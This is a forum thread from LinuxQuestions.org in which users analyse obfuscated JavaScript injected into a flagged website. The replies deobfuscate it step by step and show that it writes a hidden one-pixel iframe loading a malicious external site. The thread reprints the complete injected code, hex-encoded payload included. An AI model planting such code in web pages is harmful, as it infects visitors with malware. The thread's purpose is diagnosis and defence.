LinuxQuestions.org
View the Most Wanted LQ Wiki articles.
Go Back   LinuxQuestions.org > Forums > Non-*NIX Forums > Programming
User Name
Password
Programming This forum is for all programming questions.
The question does not have to be directly related to Linux and any language is fair game.

Notices

Reply
 
Search this Thread
Old 07-20-2008, 11:14 PM   #1
Doctorzongo
Member
 
Registered: Mar 2008
Distribution: Fedora 11
Posts: 72

Rep: Reputation: 15
Is this JavaScript malicious?


Hello. I am extremely new to the world of JavaScript (i.e. I can make buttons) and I need someone to tell me if the following code is malicious. Google has reported the site that it belongs to (asgardhighcouncil.org) as malicious. Thanks.

Code:
<!--pw94sjwqo4B1reiwnc--><script type="text/javascript">
function C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return
 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072="";

for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5
.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));
}document.write(B0A173316D010072);}DB47FCE800845F2179C("3C696672616D652073
72633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F22207769647468
3D312068656967687
43D31207374796C653D227669736962696C6974793A68696464656E3B706
F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
The above was directly after the </html> tag.
It looks to me to be junk ... but maybe I am just not advanced enough yet.

And could someone explain to me what it does?
 
Old 07-20-2008, 11:51 PM   #2
jesseruu
LQ Newbie
 
Registered: Oct 2007
Distribution: Open SUSE 10.2, DSL
Posts: 19

Rep: Reputation: 0
yep thats one malicious code....

I copied it into notepad and saved it as htm with the html tags ect.

and when i run it McAfee tells me its a troyan...


one question whats that code supposed to be?
 
Old 07-21-2008, 12:03 AM   #3
jesseruu
LQ Newbie
 
Registered: Oct 2007
Distribution: Open SUSE 10.2, DSL
Posts: 19

Rep: Reputation: 0
I have now searched quite a few forums for that code and in everyone of them someones said its a troyan virus...

hope this helped
 
Old 07-21-2008, 02:49 AM   #4
fcdev
Member
 
Registered: Sep 2005
Posts: 47

Rep: Reputation: 15
What the coder has done is replace function and parameter names with numbers that look like hexadecimal numbers (making it harder to read)

Using a text editor ...

Replace C78D9ED077610F5E11 with hex_str
Replace E69961B4A47426004A21A064DA3 with func_16
Replace CF7A2398A7A3B02EEF51A624DC28F2 with func_2
Replace D89D6EB726D3262DEA5 with source_str
Replace DB47FCE800845F2179C with decode
Replace B0A173316D010072 with the_text
Replace D6BE4D56711AC9FE592 with index
Replace C7D36720260A79BEECF3B8D6D with hex2dec

This converts the code to something like this ...
-----------------------------------------------------------------------
function hex2dec(hex_str)
{
function func_16()
{ return 16;
}
return (
parseInt(hex_str,
func16()
)
);
}

function decode(source_str)
{
function func_2()
{
return 2;
}
var the_text="";

for(index=0; index<source_str.length; index+=func_2())
{ the_text+=(String.fromCharCode(hex2dec(source_str.substr(index,func_2()))));
}
document.write(the_text);
}

decode("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D 31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C 757465223E3C2F696672616D653E");
-----------------------------------------------------------------------

func_16 just returns 16, so we replace any calls to that with the number 16.
func_2 just returns 2, so we replace any calls to that with the number 2

This makes the code even simpler to follow ...

-----------------------------------------------------------------------
function hex2dec(hex_str)
{
return (
parseInt( hex_str, 16 )
);
}

function decode(source_str)
{
var the_text="";

for(index=0; index<source_str.length; index+=2)
{ the_text+=(String.fromCharCode(hex2dec(source_str.substr(index,2))));
}
document.write(the_text);
}

decode("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D 31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C 757465223E3C2F696672616D653E");
-----------------------------------------------------------------------

So, that big long string is a series of 2 digit hexadecimal numbers, then it's converting them into integers, and then converts that integer back into a printable character. Therefore, every 2 characters in that string is being converted into one character. Whever it's decoded into is then sent to the HTML parser. I haven't had time to decode that string, but my guess is that it's not too friendly. Maybe someone else could decode it and tell us what it says.
 
Old 07-21-2008, 05:10 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Decoding that string results in a one pixel style=visibility:hidden iframe being added to the page (what domain it provides (has "money" in it) should not be posted exactly here as the URI will be malicious and we need not advertise it anyway) and IIGC details of the trojan itself are at http://vil.nai.com/vil/content/v_144460.htm.

SANS' "Decoding Javascript": http://handlers.sans.org/dwesemann/decode/
Jsdecode (SpiderMonkey wrapper): http://www.disog.org/public/jsdecode.pl.txt
Malzilla (w32): http://malzilla.sourceforge.net/
 
Old 07-21-2008, 10:44 AM   #6
Doctorzongo
Member
 
Registered: Mar 2008
Distribution: Fedora 11
Posts: 72

Original Poster
Rep: Reputation: 15
Alright -- sorry. Thanks everyone for helping. I needed to make sure that it was malicious. Does anyone know of websites having that code injected during an attack?
 
Old 07-21-2008, 03:42 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Quote:
Originally Posted by Doctorzongo View Post
Does anyone know of websites having that code injected during an attack?
Unless you're trawling for vulnerable sites, what good would that do you? Shouldn't your question instead read: "How do I clean up and prevent his from happening ever again?"
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Windows Malicious Software Removal Tool weibullguy General 2 04-14-2008 11:32 AM
question about malicious pkg creation wakeboarder3780 Linux - Newbie 9 05-04-2006 04:50 PM
Malicious Script jspsandhu Linux - General 12 09-29-2005 05:05 PM
Malicious C code protection gdboling Programming 4 09-02-2003 06:14 PM
Protecting against malicious PHP paranoid Linux - Security 0 03-14-2003 09:32 AM


All times are GMT -5. The time now is 08:25 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration